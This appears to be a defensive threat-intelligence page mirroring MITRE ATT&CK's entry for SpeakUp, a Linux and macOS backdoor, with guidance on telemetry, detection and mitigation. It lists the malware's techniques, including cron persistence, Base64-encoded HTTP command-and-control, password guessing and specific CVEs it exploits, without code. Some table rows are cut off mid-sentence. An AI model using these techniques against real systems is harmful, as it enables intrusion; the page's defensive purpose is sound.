S0374: SpeakUp
Analyst context for executives and security teams
SpeakUp matters because it represents a Linux and macOS backdoor family with behaviors that touch execution, persistence, discovery, credential access, command-and-control, tool transfer, and cleanup. For leaders, the key issue is not the malware name alone; it is whether Unix-like endpoints and servers have enough visibility to show when a backdoor is profiling the host, mapping network services, using web traffic for command-and-control, scheduling persistence through cron, or deleting artifacts.
Executive priority
Prioritize this as a Unix/Linux and macOS visibility and response-readiness question. Security leaders should ask whether SOC and IR teams can collect and retain the evidence needed to investigate backdoor activity on non-Windows systems: process execution, shell and Python activity, cron changes, authentication attempts, network connections, downloaded files, and file deletion. This is also relevant to vulnerability and exposure management because the related ATT&CK behaviors include exploitation for client execution, password guessing, and network service discovery.
Technical view
ATT&CK does not provide a dedicated detection note for SpeakUp, so validation should be behavior-led. On Linux and macOS, defenders should test visibility around the related techniques: system, user, network configuration, network connection, and network service discovery; command and scripting interpreter use, including Python; cron-based scheduled execution; web-protocol command-and-control; standard encoding or encrypted/encoded files; ingress tool transfer; password guessing; exploitation for client execution; and file deletion. Detection engineering should correlate these behaviors rather than relying on a single malware signature.
Likely telemetry
- Linux and macOS process creation and command-line telemetry
- Shell and Python interpreter execution records
- Cron and crontab file change monitoring
- Authentication logs showing repeated or unusual password guessing patterns
- Network connection and DNS/proxy/web traffic logs for outbound HTTP/S-like command-and-control patterns
Detection direction
- Validate that Linux and macOS systems are covered, not only Windows endpoints.
- Create behavior correlations for discovery commands followed by outbound web traffic, tool transfer, cron persistence, or file deletion.
- Tune carefully for administrator activity: network enumeration, shell use, Python execution, and cron changes can be legitimate on Unix-like systems.
- Review whether web-protocol monitoring can identify unusual destinations, uncommon user agents, encoded payload patterns, or unexpected outbound traffic from servers.
- Confirm that file deletion and temporary artifact cleanup are logged with enough retention to support incident response.
Mitigation priorities
- Strengthen monitoring and hardening for Linux and macOS endpoints and servers before focusing on malware-family-specific signatures.
- Restrict and monitor administrative shell, Python, and cron usage according to operational need.
- Reduce credential-guessing risk with strong authentication controls, rate limiting or lockout where appropriate, and review of exposed authentication surfaces.
- Limit unnecessary outbound web access from servers and inspect egress patterns consistent with command-and-control or tool transfer.
- Maintain vulnerability management for client applications and services that could support code execution paths.
Analyst notes and limits
The supplied ATT&CK object identifies SpeakUp as a Trojan backdoor targeting Linux and OSX/macOS devices, first observed in January 2019. The relationship set provides the most useful defensive context: discovery, execution, cron persistence, web-protocol C2, encoding, tool transfer, password guessing, exploitation for client execution, and file deletion. Treat this as a coverage validation object for Unix-like environments.
No official ATT&CK detection text is provided, tactics are not specified on the malware object itself, and the supplied fields do not support claims about current activity, attribution, victimology, exploit details, or guaranteed detection coverage. Local telemetry, baselines, and exposure data are required to determine material risk.
SpeakUp
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1082 | System Information Discovery | SpeakUp uses the |
| Enterprise | T1053.003 | Cron Sub-technique | SpeakUp uses cron tasks to ensure persistence. CitationCheckPoint SpeakUp Feb 2019 |
| Enterprise | T1105 | Ingress Tool Transfer | SpeakUp downloads and executes additional files from a remote server. CitationCheckPoint SpeakUp Feb 2019 |
| Enterprise | T1059.006 | Python Sub-technique | SpeakUp uses Python scripts.CitationCheckPoint SpeakUp Feb 2019 |
| Enterprise | T1110.001 | Password Guessing Sub-technique | SpeakUp can perform brute forcing using a pre-defined list of usernames and passwords in an attempt to log in to administrative panels. CitationCheckPoint SpeakUp Feb 2019 |
| Enterprise | T1033 | System Owner/User Discovery | SpeakUp uses the |
| Enterprise | T1046 | Network Service Discovery | SpeakUp checks for availability of specific ports on servers.CitationCheckPoint SpeakUp Feb 2019 |
| Enterprise | T1071.001 | Web Protocols Sub-technique | SpeakUp uses POST and GET requests over HTTP to communicate with its main C&C server. CitationCheckPoint SpeakUp Feb 2019 |
| Enterprise | T1016 | System Network Configuration Discovery | SpeakUp uses the |
| Enterprise | T1203 | Exploitation for Client Execution | SpeakUp attempts to exploit the following vulnerabilities in order to execute its malicious script: CVE-2012-0874, CVE-2010-1871, CVE-2017-10271, CVE-2018-2894, CVE-2016-3088, JBoss AS 3/4/5/6, and the Hadoop YARN ResourceManager. CitationCheckPoint SpeakUp Feb 2019 |
| Enterprise | T1070.004 | File Deletion Sub-technique | SpeakUp deletes files to remove evidence on the machine. CitationCheckPoint SpeakUp Feb 2019 |
| Enterprise | T1059 | Command and Scripting Interpreter | SpeakUp uses Perl scripts.CitationCheckPoint SpeakUp Feb 2019 |
| Enterprise | T1132.001 | Standard Encoding Sub-technique | SpeakUp encodes C&C communication using Base64. CitationCheckPoint SpeakUp Feb 2019 |
| Enterprise | T1027.013 | Encrypted/Encoded File Sub-technique | SpeakUp encodes its second-stage payload with Base64. CitationCheckPoint SpeakUp Feb 2019 |
| Enterprise | T1049 | System Network Connections Discovery | SpeakUp uses the |
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.2 | Current bundle | ff29e9913230… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
CheckPoint SpeakUp Feb 2019
Check Point Research. (2019, February 4). SpeakUp: A New Undetected Backdoor Linux Trojan. Retrieved April 17, 2019.
Open source URL -
[2]
mitre-attack S0374Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.